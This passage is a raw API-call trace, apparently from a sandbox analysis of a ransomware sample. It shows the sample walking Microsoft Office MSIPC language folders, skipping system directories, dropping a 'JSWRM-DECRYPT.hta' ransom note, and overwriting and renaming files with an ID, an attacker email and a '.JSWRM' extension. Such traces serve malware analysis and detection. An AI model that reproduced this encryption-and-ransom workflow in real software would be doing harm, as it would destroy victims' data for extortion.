ftLastWriteTime.dwLowDateTime=0xf44c8b33, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.888] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0136.888] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0136.888] lstrcmpiW (lpString1="sr-Latn-CS", lpString2=".") returned 1 [0136.888] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="..") returned 1 [0136.888] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="...") returned 1 [0136.888] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="windows") returned -1 [0136.888] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="recovery") returned 1 [0136.888] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="perflogs") returned 1 [0136.888] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="documents and settings") returned 1 [0136.888] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="$RECYCLE.BIN") returned 1 [0136.888] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="system volume information") returned -1 [0136.888] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="msocache") returned 1 [0136.888] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-latn-cs\\jswrm-decrypt.hta")) returned 0xffffffff [0136.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.889] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-latn-cs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.890] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.890] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.891] CloseHandle (hObject=0x238) returned 1 [0136.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-latn-cs\\jswrm-decrypt.hta")) returned 0x20 [0136.891] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Latn-CS\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4840722e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231e80 [0136.891] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.891] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4840722e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.891] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.891] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.891] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4840722e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4840722e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4840722e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.891] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.892] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.892] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.892] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.892] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.892] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.892] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.892] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.892] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.892] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.892] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.892] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.892] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Latn-CS\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-latn-cs\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.893] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21144) returned 1 [0136.893] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.893] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5290, lpOverlapped=0x0) returned 1 [0136.896] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.896] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5290, lpOverlapped=0x0) returned 1 [0136.896] CloseHandle (hObject=0x314) returned 1 [0136.896] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Latn-CS\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-latn-cs\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Latn-CS\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-latn-cs\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.898] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1ae94c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1ae94c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.898] FindClose (in: hFindFile=0x231e80 | out: hFindFile=0x231e80) returned 1 [0136.898] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sv", cAlternateFileName="")) returned 1 [0136.898] lstrcmpiW (lpString1="sv", lpString2=".") returned 1 [0136.898] lstrcmpiW (lpString1="sv", lpString2="..") returned 1 [0136.898] lstrcmpiW (lpString1="sv", lpString2="...") returned 1 [0136.898] lstrcmpiW (lpString1="sv", lpString2="windows") returned -1 [0136.898] lstrcmpiW (lpString1="sv", lpString2="recovery") returned 1 [0136.898] lstrcmpiW (lpString1="sv", lpString2="perflogs") returned 1 [0136.898] lstrcmpiW (lpString1="sv", lpString2="documents and settings") returned 1 [0136.898] lstrcmpiW (lpString1="sv", lpString2="$RECYCLE.BIN") returned 1 [0136.898] lstrcmpiW (lpString1="sv", lpString2="system volume information") returned -1 [0136.898] lstrcmpiW (lpString1="sv", lpString2="msocache") returned 1 [0136.898] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sv\\jswrm-decrypt.hta")) returned 0xffffffff [0136.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sv\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.899] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.899] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.900] CloseHandle (hObject=0x238) returned 1 [0136.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sv\\jswrm-decrypt.hta")) returned 0x20 [0136.900] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sv\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4842d625, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232080 [0136.900] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.900] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4842d625, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.900] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.900] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.900] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4842d625, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4842d625, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4842d625, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.900] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.900] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.900] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.900] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.900] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.901] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.901] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.901] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.901] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.901] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.901] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.901] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.901] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.901] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.901] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.901] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.901] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.901] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.901] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.901] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.901] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sv\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sv\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.902] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20632) returned 1 [0136.902] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.902] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5090, lpOverlapped=0x0) returned 1 [0136.905] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.905] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5090, lpOverlapped=0x0) returned 1 [0136.905] CloseHandle (hObject=0x314) returned 1 [0136.905] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sv\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sv\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sv\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sv\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.906] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.906] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0136.906] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb67b102, 